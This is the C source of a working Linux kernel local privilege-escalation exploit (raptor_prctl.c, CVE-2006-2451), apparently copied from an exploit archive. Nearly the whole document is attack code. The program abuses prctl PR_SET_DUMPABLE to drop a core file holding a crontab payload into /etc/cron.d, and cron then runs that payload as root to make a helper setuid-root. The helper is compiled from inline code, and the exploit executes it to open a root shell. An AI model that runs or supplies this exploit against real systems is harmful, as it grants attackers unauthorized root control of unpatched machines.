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Linux Kernel 2.6.13 <= 2.6.17.4 sys_prctl() Local Root Exploit (3)
================================================================== Linux Kernel 2.6.13 <= 2.6.17.4 sys_prctl() Local Root Exploit (3) ================================================================== /* * $Id: raptor_prctl.c,v 1.1 2006/07/13 14:21:43 raptor Exp $ * * raptor_prctl.c - Linux 2.6.x suid_dumpable vulnerability * Copyright (c) 2006 Marco Ivaldi <raptor@0xdeadbeef.info> * * The suid_dumpable support in Linux kernel 2.6.13 up to versions before * 2.6.17.4, and 2.6.16 before 2.6.16.24, allows a local user to cause a denial * of service (disk consumption) and POSSIBILY (yeah, sure;) gain privileges * via the PR_SET_DUMPABLE argument of the prctl function and a program that * causes a core dump file to be created in a directory for which the user does * not have permissions (CVE-2006-2451). * * Berlin, Sunday July 9th 2006: CAMPIONI DEL MONDO! CAMPIONI DEL MONDO! * CAMPIONI DEL MONDO! (i was tempted to name this exploit "pajolo.c";)) * * Greets to Paul Starzetz and Roman Medina, who also exploited this ugly bug. * * NOTE. This exploit uses the Vixie's crontab /etc/cron.d attack vector: this * means that distributions that use a different configuration (namely Dillon's * crontab on Slackware Linux) can be vulnerable but not directly exploitable. * * Usage: * $ gcc raptor_prctl.c -o raptor_prctl -Wall * [exploit must be dinamically linked] * $ ./raptor_prctl * [...] * sh-3.00# * * Vulnerable platforms: * Linux from 2.6.13 up to 2.6.17.4 [tested on SuSE Linux 2.6.13-15.8-default] */ #include <stdio.h> #include <unistd.h> #include <stdlib.h> #include <signal.h> #include <sys/stat.h> #include <sys/resource.h> #include <sys/prctl.h> #define INFO1 "raptor_prctl.c - Linux 2.6.x suid_dumpable vulnerability" #define INFO2 "Copyright (c) 2006 Marco Ivaldi <raptor@0xdeadbeef.info>" char payload[] = /* commands to be executed by privileged crond */ "\nSHELL=/bin/sh\nPATH=/usr/bin:/usr/sbin:/sbin:/bin\n* * * * * root chown root /tmp/pwned; chmod 4755 /tmp/pwned; rm -f /etc/cron.d/core\n"; char pwnage[] = /* build setuid() helper to circumvent bash checks */ "echo \"main(){setuid(0);setgid(0);system(\\\"/bin/sh\\\");}\" > /tmp/pwned.c; gcc /tmp/pwned.c -o /tmp/pwned &>/dev/null; rm -f /tmp/pwned.c"; int main(void) { int pid, i; struct rlimit corelimit; struct stat st; /* print exploit information */ fprintf(stderr, "%s\n%s\n\n", INFO1, INFO2); /* prepare the setuid() helper */ system(pwnage); /* set core size to unlimited */ corelimit.rlim_cur = RLIM_INFINITY; corelimit.rlim_max = RLIM_INFINITY; setrlimit(RLIMIT_CORE, &corelimit); /* let's do the PR_SET_DUMPABLE magic */ if (!(pid = fork())) { chdir("/etc/cron.d"); prctl(PR_SET_DUMPABLE, 2); sleep(666); exit(1); } kill(pid, SIGSEGV); /* did it work? */ sleep(3); if (stat("/etc/cron.d/core", &st) < 0) { fprintf(stderr, "Error: Not vulnerable? See comments.\n"); exit(1); } fprintf(stderr, "Ready to uncork the champagne? "); fprintf(stderr, "Please wait a couple of minutes;)\n"); /* wait for crond to execute our evil entry */ for (i = 0; i < 124; i += 2) { if (stat("/tmp/pwned", &st) < 0) { fprintf(stderr, "\nError: Check /tmp/pwned!\n"); exit(1); } if (st.st_uid == 0) break; fprintf(stderr, "."); sleep(2); } /* timeout reached? */ if (i > 120) { fprintf(stderr, "\nTimeout: Check /tmp/pwned!\n"); exit(1); } /* total pwnage */ fprintf(stderr, "CAMPIONI DEL MONDO!\n\n"); system("/tmp/pwned"); exit(0); } # 0day.today [2024-11-15] #